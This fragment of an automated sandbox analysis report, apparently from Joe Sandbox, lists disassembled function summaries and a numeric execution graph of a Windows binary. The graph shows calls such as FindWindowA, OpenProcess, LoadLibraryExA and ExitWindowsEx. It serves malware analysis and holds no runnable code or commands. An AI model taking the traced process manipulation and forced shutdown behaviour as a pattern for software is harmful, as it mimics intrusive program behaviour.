                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Shell.Explorer$about:blank
                                                                                      • API String ID: 0-874089819
                                                                                      • Opcode ID: 82103f05ed6fce802906265e1e193abb2f9ddcf6bbfbd39e06f5d39419f9593e
                                                                                      • Instruction ID: bd1a186621fddd946f4565b797d85f2c3baaa4171c5ed536e942b9a34f218066
                                                                                      • Opcode Fuzzy Hash: 82103f05ed6fce802906265e1e193abb2f9ddcf6bbfbd39e06f5d39419f9593e
                                                                                      • Instruction Fuzzy Hash: AC21957530060AAFD704AF61C890EA7BB68BF89714B15851FF50587681CF79EC84CB99
                                                                                      APIs
                                                                                        • Part of subcall function 0040DEB5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0040DED4
                                                                                        • Part of subcall function 0040DEB5: GetProcAddress.KERNEL32(00441E58,CryptUnprotectMemory), ref: 0040DEE4
                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,0040DF2E), ref: 0040DFB5
                                                                                      Strings
                                                                                      • CryptUnprotectMemory failed, xrefs: 0040DFAD
                                                                                      • CryptProtectMemory failed, xrefs: 0040DF75
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$CurrentProcess
                                                                                      • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                      • API String ID: 2190909847-396321323
                                                                                      • Opcode ID: 75447ea78798f300276a7d8dbedc4bdf709c91a09c2fc9fa621eb3f6d439b897
                                                                                      • Instruction ID: bd8cbad2415a8e52a6ae8fb3d5db5bafffe0558d4e46824eebb325400524a47f
                                                                                      • Opcode Fuzzy Hash: 75447ea78798f300276a7d8dbedc4bdf709c91a09c2fc9fa621eb3f6d439b897
                                                                                      • Instruction Fuzzy Hash: F6115E71B081175BDB1197A9DC01A6B7399AF85714B14C03BF803FA2D1DB78DC4446DC
                                                                                      APIs
                                                                                        • Part of subcall function 0040CED7: GetWindowRect.USER32(?,?), ref: 0040CF0E
                                                                                        • Part of subcall function 0040CED7: GetClientRect.USER32(?,?), ref: 0040CF1A
                                                                                        • Part of subcall function 0040CED7: GetWindowLongW.USER32(?,000000F0), ref: 0040CFBB
                                                                                        • Part of subcall function 0040CED7: GetWindowRect.USER32(?,?), ref: 0040CFE8
                                                                                        • Part of subcall function 0040CED7: GetWindowTextW.USER32(?,?,00000400), ref: 0040D007
                                                                                      • GetDlgItem.USER32(00000000,00003021), ref: 0040132B
                                                                                      • SetWindowTextW.USER32(00000000,004302E4), ref: 00401341
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Rect$Text$ClientItemLong
                                                                                      • String ID: 0
                                                                                      • API String ID: 660763476-4108050209
                                                                                      • Opcode ID: 03602c7cc300b2fb414b74c470aaaa0ff67f8af0a5f6a16136b5b980f5256f13
                                                                                      • Instruction ID: 634b9c1a618eabc1432a9cca45ba6a5c4f9a078cbf5d22d980ad555275b14f8b
                                                                                      • Opcode Fuzzy Hash: 03602c7cc300b2fb414b74c470aaaa0ff67f8af0a5f6a16136b5b980f5256f13
                                                                                      • Instruction Fuzzy Hash: AFF0A4B0540248ABEF152F50CC0AAEB7B5A9B04748F489136FE45746F1C77CD850DB5C
                                                                                      APIs
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,0040FD0B,?,?,0040FD80,?,?,?,?,?,0040FD6A), ref: 0040FACD
                                                                                      • GetLastError.KERNEL32(?,?,0040FD80,?,?,?,?,?,0040FD6A), ref: 0040FAD9
                                                                                        • Part of subcall function 00406DD3: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00406DF1
                                                                                      Strings
                                                                                      • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 0040FAE2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                      • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                      • API String ID: 1091760877-2248577382
                                                                                      • Opcode ID: ca3bc7d3eb601de886ace3ab94fb90e8f086a0082c109aa78ec3a03241ef52a3
                                                                                      • Instruction ID: cd3685a53f5d58efe78c1ff89521e9a9f7fe5c9133110a0b543a6ec56afcdb30
                                                                                      • Opcode Fuzzy Hash: ca3bc7d3eb601de886ace3ab94fb90e8f086a0082c109aa78ec3a03241ef52a3
                                                                                      • Instruction Fuzzy Hash: C4D05E7260843167D61133287C1AE6F79149F12734F25573BF13AB92E5CB780C61869E

                                                                                      Execution Graph

                                                                                      Execution Coverage:6.2%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:15%
                                                                                      Total number of Nodes:2000
                                                                                      Total number of Limit Nodes:101
CreateEventA 59565->59566 59567 1102e7bf GetSystemMetrics 59565->59567 59574 1102e805 59566->59574 59575 1102e819 59566->59575 59567->59566 59569 1102e7ce 59567->59569 59568->59565 59572 111450a0 std::locale::_Init 93 API calls 59568->59572 59570 11146450 std::locale::_Init 21 API calls 59569->59570 59573 1102e7d8 59570->59573 59572->59565 60600 1102d330 59573->60600 60744 11029450 274 API calls 2 library calls 59574->60744 59578 1110f420 std::locale::_Init 274 API calls 59575->59578 59579 1102e820 59578->59579 59580 1102e840 59579->59580 59581 111100d0 414 API calls 59579->59581 59582 1110f420 std::locale::_Init 274 API calls 59580->59582 59581->59580 59583 1102e854 59582->59583 59584 111100d0 414 API calls 59583->59584 59585 1102e874 59583->59585 59584->59585 59586 1110f420 std::locale::_Init 274 API calls 59585->59586 59587 1102e8f3 59586->59587 59588 1110f420 std::locale::_Init 274 API calls 59587->59588 59589 1102e93d 59588->59589 59590 1102e962 FindWindowA 59589->59590 60745 11060be0 280 API calls std::locale::_Init 59589->60745 59593 1102eab7 59590->59593 59594 1102e99b 59590->59594 59943 110613d0 59593->59943 59594->59593 59597 1102e9b3 GetWindowThreadProcessId 59594->59597 59599 11146450 std::locale::_Init 21 API calls 59597->59599 59598 110613d0 276 API calls 59600 1102ead5 59598->59600 59601 1102e9d9 OpenProcess 59599->59601 59602 110613d0 276 API calls 59600->59602 59601->59593 59603 1102e9f9 59601->59603 59604 1102eae1 59602->59604 60746 11094b30 100 API calls 59603->60746 59606 1102eaf8 59604->59606 59607 1102eaef 59604->59607 59950 11145910 59606->59950 60747 11027d60 120 API calls 2 library calls 59607->60747 59608 1102ea18 59610 11146450 std::locale::_Init 21 API calls 59608->59610 59613 1102ea2c 59610->59613 59611 1102eaf4 59611->59606 59614 1102ea6b CloseHandle FindWindowA 59613->59614 59615 11146450 std::locale::_Init 21 API calls 59613->59615 59616 1102ea93 GetWindowThreadProcessId 59614->59616 59617 1102eaa7 59614->59617 59620 1102ea3e 
SendMessageA WaitForSingleObject 59615->59620 59616->59617 59618 11146450 std::locale::_Init 21 API calls 59617->59618 59621 1102eab4 59618->59621 59619 1102eb07 59965 11143230 59619->59965 59620->59614 59623 1102ea5e 59620->59623 59621->59593 59625 11146450 std::locale::_Init 21 API calls 59623->59625 59624 1102eb2a 59626 1102ec01 59624->59626 59976 11062d60 59624->59976 59627 1102ea68 59625->59627 59991 110274c0 59626->59991 59627->59614 59631 110b7920 std::locale::_Init 9 API calls 59632 1102eb5e 59631->59632 59634 11146450 std::locale::_Init 21 API calls 59632->59634 59633 1102ec26 59643 1102ec41 59633->59643 60010 1102a620 59633->60010 59637 1102eb70 59634->59637 59641 1102a620 std::locale::_Init 144 API calls 59641->59643 60013 110281a0 59643->60013 59940 11142bc5 59939->59940 59941 11165797 84 API calls std::locale::_Init 59940->59941 59942 1102e6d4 59940->59942 59941->59940 59942->59560 60590 11081bb0 59942->60590 59944 11061446 59943->59944 59945 110613f7 59943->59945 59946 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 59944->59946 59945->59944 59948 11081bb0 87 API calls 59945->59948 60806 110612f0 276 API calls 4 library calls 59945->60806 59947 1102eac9 59946->59947 59947->59598 59948->59945 60807 11144bd0 59950->60807 59953 11144bd0 std::locale::_Init 274 API calls 59954 11145947 wsprintfA 59953->59954 59955 11143230 std::locale::_Init 8 API calls 59954->59955 59956 11145964 59955->59956 59957 11145990 59956->59957 59958 11143230 std::locale::_Init 8 API calls 59956->59958 59959 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 59957->59959 59961 11145979 59958->59961 59960 1114599c 59959->59960 59960->59619 59961->59957 59962 11145980 59961->59962 59963 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 59962->59963 59964 1114598c 59963->59964 59964->59619 59966 11143251 CreateFileA 59965->59966 59968 111432ee CloseHandle 59966->59968 59969 111432ce 59966->59969 59970 
11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 59968->59970 59971 111432d2 CreateFileA 59969->59971 59972 1114330b 59969->59972 59973 11143307 59970->59973 59971->59968 59971->59972 59974 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 59972->59974 59973->59624 59975 1114331a 59974->59975 59975->59624 59977 1105dd10 78 API calls 59976->59977 59978 11062d88 59977->59978 60856 11061c90 59978->60856 59980 1102eb51 59980->59626 59980->59631 59982 1105de40 5 API calls 59983 11062de9 59982->59983 59984 1105dd10 78 API calls 59983->59984 59985 11062e1d 59984->59985 59986 11062e3c 59985->59986 59989 1105de40 5 API calls 59985->59989 59987 1105dd10 78 API calls 59986->59987 59989->59986 59992 110274f4 59991->59992 59993 1105dd10 78 API calls 59992->59993 59995 11027509 59993->59995 59994 1102755f LoadIconA 59997 11027571 59994->59997 59998 1102757a GetSystemMetrics GetSystemMetrics LoadImageA 59994->59998 59995->59994 59996 11145320 std::locale::_Init 93 API calls 59995->59996 59999 110275d8 59995->59999 60001 11027542 LoadLibraryExA 59996->60001 59997->59998 60002 110275b3 59998->60002 60003 1102759f LoadIconA 59998->60003 60000 1102768c 59999->60000 60008 11081bb0 87 API calls 59999->60008 60009 111450a0 std::locale::_Init 93 API calls 59999->60009 61608 110612f0 276 API calls 4 library calls 59999->61608 60004 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 60000->60004 60001->59994 60001->60003 60002->59999 60006 110275b7 GetSystemMetrics GetSystemMetrics LoadImageA 60002->60006 60003->60002 60007 11027699 60004->60007 60006->59999 60007->59633 60008->59999 60009->59999 61609 110285f0 60010->61609 60012 1102a62e 60012->59641 60014 11146450 std::locale::_Init 21 API calls 60013->60014 60015 110281c6 60014->60015 60016 110282b4 60015->60016 60017 110281dd GetModuleFileNameA 60015->60017 61643 11013830 22 API calls 2 library calls 60016->61643 60019 11081b40 std::locale::_Init 
IsDBCSLeadByte 60017->60019 60021 11028201 60019->60021 60020 110282c7 60022 110282cd 60020->60022 60021->60022 60023 1102820e wsprintfA 60021->60023 60024 11146450 std::locale::_Init 21 API calls 60022->60024 60026 11028242 60023->60026 60025 110282db LoadLibraryExA 60024->60025 60026->60022 60027 1102824a WaitForSingleObject GetExitCodeProcess 60026->60027 60583 11142a6e 60582->60583 60584 11142aa8 60582->60584 60583->60584 60587 11142a92 60583->60587 60585 11142290 std::locale::_Init 274 API calls 60584->60585 60586 11142ab0 60585->60586 60586->59557 62578 11142310 276 API calls std::locale::_Init 60587->62578 60589 11142a98 60589->59557 60591 11081bbd 60590->60591 60592 11081bc2 60590->60592 62579 11081990 IsDBCSLeadByte 60591->62579 60594 11081bcb 60592->60594 60599 11081bdf 60592->60599 62580 111646ce 79 API calls 3 library calls 60594->62580 60596 11081bd8 60596->59562 60597 11081c43 60597->59562 60598 11165797 84 API calls std::locale::_Init 60598->60599 60599->60597 60599->60598 60601 11146450 std::locale::_Init 21 API calls 60600->60601 60602 1102d36c 60601->60602 60603 11145320 std::locale::_Init 93 API calls 60602->60603 60604 1102d374 60603->60604 60605 1102d3a9 GetCurrentProcess SetPriorityClass 60604->60605 60606 1102d37d InterlockedIncrement 60604->60606 60609 1102d3dd 60605->60609 60606->60605 60607 1102d38c 60606->60607 60608 11146450 std::locale::_Init 21 API calls 60607->60608 60610 1102d396 60608->60610 60611 1102d3e6 SetEvent 60609->60611 60614 1102d3ed 60609->60614 60613 1102d3a0 Sleep 60610->60613 60611->60614 60612 1102d424 60618 1102d452 60612->60618 62600 1109f1d0 279 API calls std::locale::_Init 60612->62600 60613->60613 60614->60612 62598 11029370 280 API calls 2 library calls 60614->62598 60617 1102d40d 62599 110ff6c0 279 API calls 2 library calls 60617->62599 62581 11028090 SetEvent 60618->62581 60621 1102d468 60622 1102d47d 60621->60622 62601 110ec980 291 API calls 60621->62601 60624 1102d49f 60622->60624 62602 110594a0 SetEvent 
60622->62602 60626 1102d4de 60624->60626 60628 1102d4b3 Sleep 60624->60628 60627 11146450 std::locale::_Init 21 API calls 60626->60627 60629 1102d4e8 60627->60629 60628->60626 60630 1102d518 60629->60630 60632 1105dd10 78 API calls 60629->60632 60633 1102d53f 60630->60633 60637 1102d58a 60630->60637 60632->60630 62582 110affa0 60633->62582 60638 1102d5a9 60637->60638 60646 1102d5cb 60637->60646 60641 1102d5af PostThreadMessageA 60638->60641 60638->60646 60639 1102d613 60642 1102d62d 60639->60642 60652 11146450 std::locale::_Init 21 API calls 60639->60652 62605 1110f3a0 WaitForSingleObject 60641->62605 60648 1102d66b 60642->60648 60649 1102d65c 60642->60649 60643 1102d5f0 62607 11059400 DeleteCriticalSection CloseHandle 60643->62607 60646->60639 60646->60643 62606 1110f3a0 WaitForSingleObject 60646->62606 60647 1102d56a 60654 1102d57d 60647->60654 62604 111352b0 306 API calls 5 library calls 60647->62604 60651 1102d681 60648->60651 60656 11075d10 404 API calls 60648->60656 62608 11105420 26 API calls std::locale::_Init 60649->62608 60657 11146450 std::locale::_Init 21 API calls 60651->60657 60652->60642 62627 1100d4e0 FreeLibrary 60654->62627 60656->60651 60661 1102d68b 60657->60661 60659 1102d661 62609 11107b50 622 API calls std::locale::_Init 60659->62609 60665 1113cc30 309 API calls 60661->60665 60663 1102d889 60664 1102d8a0 60663->60664 62628 1100d200 wsprintfA 60663->62628 60674 1102d8c7 GetModuleFileNameA GetFileAttributesA 60664->60674 60689 1102d9fa 60664->60689 60670 1102d690 60665->60670 60666 1102d666 62610 11105ac0 356 API calls std::locale::_Init 60666->62610 60672 11146450 std::locale::_Init 21 API calls 60670->60672 60671 1102d895 60673 11146450 std::locale::_Init 21 API calls 60671->60673 60675 1102d69a 60672->60675 60673->60664 60676 1102d8ef 60674->60676 60674->60689 60677 1102d6b7 60675->60677 60678 1102d6a9 60675->60678 60681 1110f420 std::locale::_Init 274 API calls 60676->60681 60680 11146450 std::locale::_Init 21 API calls 60677->60680 62611 
1109d920 WaitForSingleObject SetEvent WaitForSingleObject CloseHandle 60678->62611 60679 11146450 std::locale::_Init 21 API calls 60683 1102da92 60679->60683 60685 1102d6c1 60680->60685 60686 1102d8f6 60681->60686 62631 11146410 FreeLibrary 60683->62631 60697 1102d6d5 std::ios_base::_Tidy 60685->60697 62612 1110e5c0 DeleteCriticalSection std::ios_base::_Tidy 60685->62612 60692 11142a60 276 API calls 60686->60692 60698 1102d918 60686->60698 60688 1102da9a 60690 1102dad6 60688->60690 60693 1102dac4 ExitWindowsEx 60688->60693 60694 1102dab4 ExitWindowsEx Sleep 60688->60694 60689->60679 60695 1102dae6 60690->60695 60696 1102dadb Sleep 60690->60696 60692->60698 60693->60690 60694->60693 60700 11146450 std::locale::_Init 21 API calls 60695->60700 60696->60695 60711 1102d74f 60697->60711 62613 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 60697->62613 60703 11142bb0 84 API calls 60698->60703 60707 1102daf0 ExitProcess 60700->60707 60701 1102d75b 62615 1110fc70 287 API calls 2 library calls 60701->62615 60710 1102d93d 60703->60710 60704 1102d7e2 60709 11146450 std::locale::_Init 21 API calls 60704->60709 60705 1102d769 60705->60704 60720 1102d760 std::ios_base::_Tidy 60705->60720 60712 1102d7ec 60709->60712 60713 1102d9e3 60710->60713 60716 11081b40 std::locale::_Init IsDBCSLeadByte 60710->60716 60711->60701 60711->60705 60714 1102d7fb 60712->60714 60715 1102d809 CloseHandle 60712->60715 60713->60689 62617 1108a570 60714->62617 60721 1102d824 60715->60721 60722 1102d82a 60715->60722 60719 1102d953 60716->60719 60717 11146450 std::locale::_Init 21 API calls 60734 1102d6ff std::ios_base::_Tidy 60717->60734 60724 1102d96e _memset 60719->60724 62629 11029450 274 API calls 2 library calls 60719->62629 60720->60704 60720->60705 62616 1110fc70 287 API calls 2 library calls 60720->62616 60725 11162be5 _free 66 API calls 60721->60725 60743 1102d869 std::ios_base::_Tidy 60722->60743 62624 1110fc10 EnterCriticalSection 
LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 60722->62624 60723 1102d800 std::ios_base::_Tidy 60723->60715 60728 1102d988 FindFirstFileA 60724->60728 60725->60722 60730 1102d9d4 60728->60730 60731 1102d9a8 FindNextFileA 60728->60731 62630 111266e0 300 API calls 5 library calls 60730->62630 60741 1102d9c8 FindClose 60731->60741 60732 1102d858 60732->60743 62626 1110fc70 287 API calls 2 library calls 60732->62626 60733 11162be5 _free 66 API calls 60736 1102d83c 60733->60736 60734->60711 60734->60717 62614 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 60734->62614 60735 1102d7d9 std::ios_base::_Tidy 60735->60704 60736->60732 60736->60733 62625 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 60736->62625 60741->60730 60743->60654 60745->59590 60746->59608 60747->59611 60806->59945 60808 11144bf2 60807->60808 60810 11144c09 std::locale::_Init 60807->60810 60853 11029450 274 API calls 2 library calls 60808->60853 60813 11144c3c GetModuleFileNameA 60810->60813 60821 11144d97 60810->60821 60812 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 60814 11144db3 wsprintfA 60812->60814 60831 11081b40 60813->60831 60814->59953 60816 11144c51 60817 11144c61 SHGetFolderPathA 60816->60817 60830 11144d48 60816->60830 60819 11144c8e 60817->60819 60820 11144cad SHGetFolderPathA 60817->60820 60818 11142290 std::locale::_Init 271 API calls 60818->60821 60819->60820 60823 11144c94 60819->60823 60824 11144ce2 60820->60824 60821->60812 60854 11029450 274 API calls 2 library calls 60823->60854 60826 1102a620 std::locale::_Init 144 API calls 60824->60826 60828 11144cf3 60826->60828 60835 11144670 60828->60835 60830->60818 60832 11081b53 _strrchr 60831->60832 60834 11081b6a std::locale::_Init 60832->60834 60855 11081990 IsDBCSLeadByte 60832->60855 60834->60816 60836 111446fa 60835->60836 60837 1114467b 60835->60837 60836->60830 60837->60836 60838 1114468b 
GetFileAttributesA 60837->60838 60839 111446a5 60838->60839 60840 11144697 60838->60840 60841 11163cf8 __strdup 66 API calls 60839->60841 60840->60830 60842 111446ac 60841->60842 60843 11081b40 std::locale::_Init IsDBCSLeadByte 60842->60843 60844 111446b6 60843->60844 60845 11144670 std::locale::_Init 67 API calls 60844->60845 60852 111446d3 60844->60852 60846 111446c6 60845->60846 60847 111446dc 60846->60847 60848 111446ce 60846->60848 60849 11162be5 _free 66 API calls 60847->60849 60850 11162be5 _free 66 API calls 60848->60850 60851 111446e1 CreateDirectoryA 60849->60851 60850->60852 60851->60852 60852->60830 60855->60834 60966 11144ea0 60856->60966 60858 11061d1c 60859 110d1550 274 API calls 60858->60859 60860 11061d30 60859->60860 60862 11061f17 60860->60862 60908 11061d44 std::ios_base::_Tidy 60860->60908 60974 1116449d 60860->60974 60861 11062c88 60865 110d07c0 274 API calls 60861->60865 60864 1116449d _fgets 81 API calls 60862->60864 60863 11163db7 std::locale::_Init 104 API calls 60863->60861 60867 11061f31 60864->60867 60898 11061e11 std::ios_base::_Tidy 60865->60898 60873 11061f97 _strpbrk 60867->60873 60874 11061f38 60867->60874 60868 11061dc7 60869 11061dce 60868->60869 60882 11061e1d _strpbrk std::locale::_Init 60868->60882 60870 11061e03 60869->60870 61022 11163db7 60869->61022 60872 110d07c0 274 API calls 60870->60872 60872->60898 60993 11163676 60873->60993 60875 11061f7d 60874->60875 60879 11163db7 std::locale::_Init 104 API calls 60874->60879 60876 110d07c0 274 API calls 60875->60876 60876->60898 60878 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 60880 11062cbf 60878->60880 60879->60875 60880->59980 60880->59982 60880->59983 60882->60862 60887 11061eb8 60882->60887 60888 11061efd 60887->60888 60892 11163db7 std::locale::_Init 104 API calls 60887->60892 60889 110d07c0 274 API calls 60888->60889 60889->60898 60892->60888 60898->60878 60908->60861 60908->60863 60971 11144eb3 std::ios_base::_Tidy 60966->60971 60968 
11144f1a std::ios_base::_Tidy 60968->60858 60969 11144ed5 GetLastError 60970 11144ee0 Sleep 60969->60970 60969->60971 60972 11163fed std::locale::_Init 137 API calls 60970->60972 60971->60968 60971->60969 61059 11163fed 60971->61059 60973 11144ef2 60972->60973 60973->60968 60973->60971 60975 111644a9 _fputs 60974->60975 60976 111644bc 60975->60976 60977 111644ed 60975->60977 61420 111692ef 66 API calls __getptd_noexit 60976->61420 60980 111644f2 __lock_file 60977->60980 60986 111644cc _fputs 60977->60986 60979 111644c1 61421 1116df04 11 API calls _fputs 60979->61421 60982 11164506 60980->60982 60987 11164571 60980->60987 61422 11169287 60982->61422 60984 1116459e 61431 111645cd LeaveCriticalSection LeaveCriticalSection _fgets 60984->61431 60986->60868 60987->60984 61400 11171a25 60987->61400 60990 1116450c 60990->60987 61429 111692ef 66 API calls __getptd_noexit 60990->61429 60991 11164566 60994 1116368f 60993->60994 61487 11163420 60994->61487 61023 11163dc3 _fputs 61022->61023 61024 11163dd5 61023->61024 61025 11163dea 61023->61025 61560 111692ef 66 API calls __getptd_noexit 61024->61560 61026 11163dfd __lock_file 61025->61026 61033 11163de5 _fputs 61025->61033 61544 11163d4a 61026->61544 61033->60870 61062 11163f31 61059->61062 61061 11163fff 61061->60971 61065 11163f3d _fputs 61062->61065 61063 11163f50 61119 111692ef 66 API calls __getptd_noexit 61063->61119 61065->61063 61067 11163f7d 61065->61067 61066 11163f55 61120 1116df04 11 API calls _fputs 61066->61120 61081 111716f8 61067->61081 61070 11163f82 61076 11163f60 @_EH4_CallFilterFunc@8 _fputs 61076->61061 61082 11171704 _fputs 61081->61082 61124 1117373c 61082->61124 61084 11171787 61131 11171822 61084->61131 61085 1117178e 61136 11169d79 61085->61136 61089 11171817 _fputs 61089->61070 61090 111717a3 InitializeCriticalSectionAndSpinCount 61091 111717d6 EnterCriticalSection 61090->61091 61092 111717c3 61090->61092 61091->61084 61095 11171712 61095->61084 61095->61085 61134 1117367a 66 API calls 9 library 
calls 61095->61134 61135 1116b048 LeaveCriticalSection LeaveCriticalSection _doexit 61095->61135 61119->61066 61120->61076 61125 11173764 EnterCriticalSection 61124->61125 61126 11173751 61124->61126 61125->61095 61142 1117367a 66 API calls 9 library calls 61126->61142 61128 11173757 61128->61125 61143 1116d7aa 66 API calls 3 library calls 61128->61143 61144 11173663 LeaveCriticalSection 61131->61144 61133 11171829 61133->61089 61134->61095 61135->61095 61138 11169d82 61136->61138 61137 11162b51 _malloc 65 API calls 61137->61138 61138->61137 61139 11169db8 61138->61139 61140 11169d99 Sleep 61138->61140 61139->61084 61139->61090 61141 11169dae 61140->61141 61141->61138 61141->61139 61142->61128 61144->61133 61401 11171a32 61400->61401 61404 11171a47 61400->61404 61465 111692ef 66 API calls __getptd_noexit 61401->61465 61403 11171a37 61466 1116df04 11 API calls _fputs 61403->61466 61406 11171a7c 61404->61406 61411 11171a42 61404->61411 61432 1117712e 61404->61432 61408 11169287 __flsbuf 66 API calls 61406->61408 61409 11171a90 61408->61409 61435 111747ed 61409->61435 61411->60987 61420->60979 61421->60986 61423 11169293 61422->61423 61424 111692a8 61422->61424 61485 111692ef 66 API calls __getptd_noexit 61423->61485 61424->60990 61426 11169298 61486 1116df04 11 API calls _fputs 61426->61486 61428 111692a3 61428->60990 61429->60991 61431->60986 61433 11169d79 __malloc_crt 66 API calls 61432->61433 61434 11177143 61433->61434 61434->61406 61465->61403 61466->61411 61485->61426 61486->61428 61499 11163399 61487->61499 61489 11163444 61507 111692ef 66 API calls __getptd_noexit 61489->61507 61495 1116347a 61500 111633ac 61499->61500 61506 111633f9 61499->61506 61501 1116b7b5 __getptd 66 API calls 61500->61501 61506->61489 61506->61495 61608->59999 61610 11028613 61609->61610 61611 11028c5b 61609->61611 61612 110286d0 GetModuleFileNameA 61610->61612 61622 11028648 61610->61622 61614 11028cf7 61611->61614 61615 11028d0a 61611->61615 61613 110286f1 _strrchr 61612->61613 
61618 11163fed std::locale::_Init 137 API calls 61613->61618 61616 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 61614->61616 61617 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 61615->61617 61619 11028d06 61616->61619 61620 11028d1b 61617->61620 61621 110286cb 61618->61621 61619->60012 61620->60012 61621->61611 61637 11026890 81 API calls 2 library calls 61621->61637 61624 11163fed std::locale::_Init 137 API calls 61622->61624 61624->61621 61625 11163db7 std::locale::_Init 104 API calls 61625->61611 61626 11028744 61634 11028bc5 61626->61634 61638 11026700 66 API calls 3 library calls 61626->61638 61628 11028780 61634->61625 61634->61634 61637->61626 61638->61628 61643->60020 62578->60589 62579->60592 62580->60596 62581->60621 62632 110805f0 62582->62632 62587 1102d54a 62591 110eb080 62587->62591 62588 110affe7 62644 11029450 274 API calls 2 library calls 62588->62644 62592 110affa0 276 API calls 62591->62592 62593 110eb0ad 62592->62593 62660 110ea450 62593->62660 62595 110eb0f1 62670 110b0190 276 API calls std::locale::_Init 62595->62670 62597 1102d555 62603 110b0190 276 API calls std::locale::_Init 62597->62603 62598->60617 62599->60612 62600->60618 62601->60622 62602->60624 62603->60647 62604->60654 62605->60638 62606->60646 62608->60659 62609->60666 62610->60648 62612->60697 62613->60734 62614->60734 62615->60720 62616->60735 62618 1108a617 62617->62618 62621 1108a5aa std::ios_base::_Tidy 62617->62621 62619 1108a61e DeleteCriticalSection 62618->62619 62673 1106e1b0 62619->62673 62620 1108a5be CloseHandle 62620->62621 62621->62618 62621->62620 62623 1108a644 std::ios_base::_Tidy 62623->60723 62624->60736 62625->60736 62626->60743 62627->60663 62628->60671 62630->60713 62631->60688 62633 11080614 62632->62633 62634 11080618 62633->62634 62635 1108062f 62633->62635 62645 11029450 274 API calls 2 library calls 62634->62645 62637 11080648 62635->62637 62638 1108062c 62635->62638 62641 110aff90 62637->62641 
